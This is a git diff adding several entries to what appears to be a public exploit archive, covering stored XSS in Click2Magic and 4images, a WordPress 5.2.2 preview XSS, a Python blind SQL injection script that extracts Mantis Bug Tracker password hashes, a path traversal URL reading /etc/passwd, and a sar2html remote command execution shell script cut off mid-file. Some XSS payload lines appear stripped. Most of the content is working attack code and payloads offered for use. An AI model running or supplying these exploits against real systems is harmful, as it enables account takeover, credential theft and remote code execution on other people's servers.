diff --git a/exploits/multiple/webapps/49347.txt b/exploits/multiple/webapps/49347.txt
new file mode 100644
index 000000000..1eec3ab0a
--- /dev/null
+++ b/exploits/multiple/webapps/49347.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Click2Magic 1.1.5 - Stored Cross-Site Scripting
+# Exploit Author: Shivam Verma(cyb3r_n3rd)
+# Date: 2020-12-25
+# Google Dork: N/A
+# Vendor Homepage: https://www.click2magic.com/user/agent/index
+# Software Link: https://www.click2magic.com
+# Version: 1.1.5
+# Category: Web Application
+# Tested on: Kali Linux
+
+Attack Vector: This Vulnerability Leads an Attacker to Inject Malicious Payloads in Chat section each time admin/user visits and manages the user data, The Malicious Payload(XSS) triggers and attacker can capture the admin cookies and access the users Data
+
+Step 1. visit the link
+Step 2. Start a new Chat
+Step 3. When ask for name paste your Xss Payload
+Step 4. Wait for the Administrator to click on Your link
+Step 5. You will receive Admin Cookie Everytime he Process the Request
+
+---
+
+XSS Payload: ">
\ No newline at end of file
diff --git a/exploits/php/webapps/49338.txt b/exploits/php/webapps/49338.txt
new file mode 100644
index 000000000..29ca3311e
--- /dev/null
+++ b/exploits/php/webapps/49338.txt
@@ -0,0 +1,68 @@
+# Exploit Title: Wordpress Core 5.2.2 - 'post previews' XSS
+# Date: 31/12/2020
+# Exploit Author: gx1
+# Vulnerability Discovery: Simon Scannell
+# Vendor Homepage: https://wordpress.com/
+# Software Link: https://github.com/WordPress/WordPress
+# Version: <= 5.2.2
+# Tested on: any
+# CVE: CVE-2019-16223
+
+# References:
+https://nvd.nist.gov/vuln/detail/CVE-2019-16223
+https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
+
+Description:
+WordPress before 5.2.3 allows XSS in post previews by authenticated users.
+
+Technical Details and Exploitation:
+The vulnerability is due to two condition:
+1. wp_kses_bad_protocol_once() has an issue with URL sanitization that can be passed and can lead to cross-site scripting vulnerability:
+
+the function sanitizes bad protocols, and applies a convertion of HTML entities to avoid bypass techniques; anyway, in vulnerable versions, it only checks for html entities after two points, as it is possible to
+observe by the applied fix:
+
+============================================================================================================================================
+function wp_kses_bad_protocol_once( $string, $allowed_protocols, $count = 1 ) {
++ $string = preg_replace( '/(�*58(?![;0-9])|�*3a(?![;a-f0-9]))/i', '$1;', $string ); # APPLIED FIX AFTER VULNERABILITY DETECTION
+ $string2 = preg_split( '/:|�*58;|�*3a;/i', $string, 2 );
+ if ( isset( $string2[1] ) && ! preg_match( '%/\?%', $string2[0] ) ) {
+
+============================================================================================================================================
+This allows an attacker to inject attack strings such as:
+
+============================================================================================================================================
+Example Attack
+============================================================================================================================================
+Anyway, Wordpress protects against this attack because it converts any type of html entities during the rendering of posts. In a particular case, during preview, it is possible to inject html entities in a URL. That is the second condition.
+
+2. During preview, get_the_content() function in post-template.php replaces URL encoded characters with a corresponding HTML entity:
+
+============================================================================================================================================
+function get_the_content( $more_link_text = null, $strip_teaser = false ) {
+
+ ...
+ if ( $preview ) // Preview fix for JavaScript bug with foreign languages.
+ $output = preg_replace_callback( '/\%u([0-9A-F]{4})/', '_convert_urlencoded_to_entities', $output );
+
+ return $output;
+}
+
+function _convert_urlencoded_to_entities( $match ) {
+ return '&#' . base_convert( $match[1], 16, 10 ) . ';';
+}
+
+============================================================================================================================================
+For this reason, it is possible to send URL encoded strings that will be converted in HTML entities during preview. HTML entities can be crafted to bypass wp_ses_bad_protocol_once() function due to issue described in condition 1.
+
+Proof Of Concept:
+1. Create a new post
+2. Insert in code editor the following HTML PoC code:
+
+poc
+
+3. Click on preview and click the "poc" link
+
+Solution:
+
+Upgrade Wordpress to version >= 5.2.3
\ No newline at end of file
diff --git a/exploits/php/webapps/49339.txt b/exploits/php/webapps/49339.txt
new file mode 100644
index 000000000..3d003f1ad
--- /dev/null
+++ b/exploits/php/webapps/49339.txt
@@ -0,0 +1,21 @@
+# Exploit Title: 4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting
+# Date: 30-12-2020
+# Exploit Author: Ritesh Gohil
+# Vendor Homepage: https://www.4homepages.de/
+# Software Link: https://www.4homepages.de/download-4images
+# Version: 1.7.11
+# Tested on: Windows 10/Kali Linux
+
+Vulnerable Parameters: Profile Image.
+
+Attack Vector:
+This vulnerability can results attacker to inject the XSS payload into the IMAGE URL and each time
+any user will go to that URL, the XSS triggers, and the attacker can able to steal the cookie according to the crafted payload.
+
+Steps-To-Reproduce:
+1. Login into 4images admin panel.
+2. Now go to the add images tab.
+3. Now paste the below payload in the URL field.
+ritesh">
+4. Now click on add button.
+5. The XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49340.py b/exploits/php/webapps/49340.py
new file mode 100755
index 000000000..6768948d7
--- /dev/null
+++ b/exploits/php/webapps/49340.py
@@ -0,0 +1,91 @@
+# Exploit Title: Mantis Bug Tracker 2.24.3 - 'access' SQL Injection
+# Date: 30/12/2020
+# Exploit Author: EthicalHCOP
+# Vendor Homepage: https://www.mantisbt.org/
+# Version: 2.24.3
+# CVE: CVE-2020-28413
+
+import requests, sys, time
+from lxml import etree
+
+proxies = {
+ "http": "http://127.0.0.1:8080",
+ "https": "http://127.0.0.1:8080",
+ }
+
+def Hacer_Peticion(query):
+ home = ""
+ url = home+"/api/soap/mantisconnect.php"
+ headers = {'content-type': 'text/xml',
+ 'SOAPAction': url+'"/mc_project_get_users"'}
+ mantis_db_user = ""
+ mantis_db_pass = ""
+ body = """
+
+
+
+ """+mantis_db_user+"""
+ """+mantis_db_pass+"""
+ 0
+ """+query+"""
+
+
+ """
+ response = requests.post(url, data=body, headers=headers, verify=False)
+ #response = requests.post(url, data=body, headers=headers, proxies=proxies, verify=False)
+ parser = etree.XMLParser(remove_blank_text=True)
+ xml = etree.XML(response.content, parser)
+ xml = etree.tostring(xml)
+ return(str(xml))
+
+def Cantidad_Usuarios_Mantis():
+ query = "0 union all select concat('-',(select count(*) " \
+ "from mantis_user_table),'0'),2,3,4 order by id asc limit 1"
+ xml = Hacer_Peticion(query)
+ txt = xml.split("integer")
+ txt = txt[1].split("id")
+ registros = str(str(str(txt[0])[:-2])[-2:])[:-1]
+ return(registros)
+
+def Obtener_Id(usr_pos):
+ query = "0 union all select concat((SELECT id FROM mantis_user_table " \
+ "order by id asc limit 0,1),'0'),2,3,4 limit "+str(usr_pos)+",1"
+ xml = Hacer_Peticion(query)
+ txt = xml.split("integer")
+ txt = txt[1].split("id")
+ id = str(str(txt[0])[:-2])[-1:]
+ name = str(str(txt[1])[29:]).split("")[0]
+ return (id+"-"+name)
+
+def brute_force(data):
+ charts = "abcdefghijklmnopqrstuvwxyz0123456789"
+ passw = ""
+ id = data.split("-")[0]
+ name = data.split("-")[1]
+ for cp in range (1,33,1):
+ for c in charts:
+ print(f"\rHash: {passw}", end="")
+ time.sleep(0.00001)
+ sys.stdout.flush()
+ query = "0 union all select (select if(substring((select binary(password) " \
+ "from mantis_user_table where id = " + str(id) + ")," + str(cp) + ",1)='" + str(c) + "','0','900000000000000000000')), 2,3,4 order by id asc limit 1"
+ xml = Hacer_Peticion(query)
+ txt = xml.split("integer")
+ txt = txt[1].split("id")
+ r_id = str(str(txt[0])[:-2])[-1:]
+ if(r_id=="0"):
+ passw = passw + str(c)
+ break
+ print(f"\r", end="")
+ sys.stdout.flush()
+ print(name+": "+passw)
+
+def main():
+ cantidad_users = Cantidad_Usuarios_Mantis()
+ print("Cantidad usuarios en db: "+str(cantidad_users))
+ print("Obteniendo Hashes...")
+ for x in range(0,int(cantidad_users),1):
+ brute_force(Obtener_Id(x))
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/49343.txt b/exploits/php/webapps/49343.txt
new file mode 100644
index 000000000..e41f6e0ef
--- /dev/null
+++ b/exploits/php/webapps/49343.txt
@@ -0,0 +1,8 @@
+# Exploit Title: Advanced Comment System 1.0 - 'ACS_path' Path Traversal
+# Date: Fri, 11 Dec 2020
+# Exploit Author: Francisco Javier Santiago Vázquez aka "n0ipr0cs"
+# Vendor Homepage: Advanced Comment System - ACS
+# Version: v1.0
+# CVE: CVE-2020-35598
+
+http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
\ No newline at end of file
diff --git a/exploits/php/webapps/49344.py b/exploits/php/webapps/49344.py
new file mode 100755
index 000000000..51aa3c5f5
--- /dev/null
+++ b/exploits/php/webapps/49344.py
@@ -0,0 +1,39 @@
+# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
+# Date: 27-12-2020
+# Exploit Author: Musyoka Ian
+# Vendor Homepage:https://github.com/cemtan/sar2html
+# Software Link: https://sourceforge.net/projects/sar2html/
+# Version: 3.2.1
+# Tested on: Ubuntu 18.04.1
+
+#!/usr/bin/env python3
+
+import requests
+import re
+from cmd import Cmd
+
+url = input("Enter The url => ")
+
+class Terminal(Cmd):
+ prompt = "Command => "
+ def default(self, args):
+ exploiter(args)
+
+def exploiter(cmd):
+ global url
+ sess = requests.session()
+ output = sess.get(f"{url}/index.php?plot=;{cmd}")
+ try:
+ out = re.findall("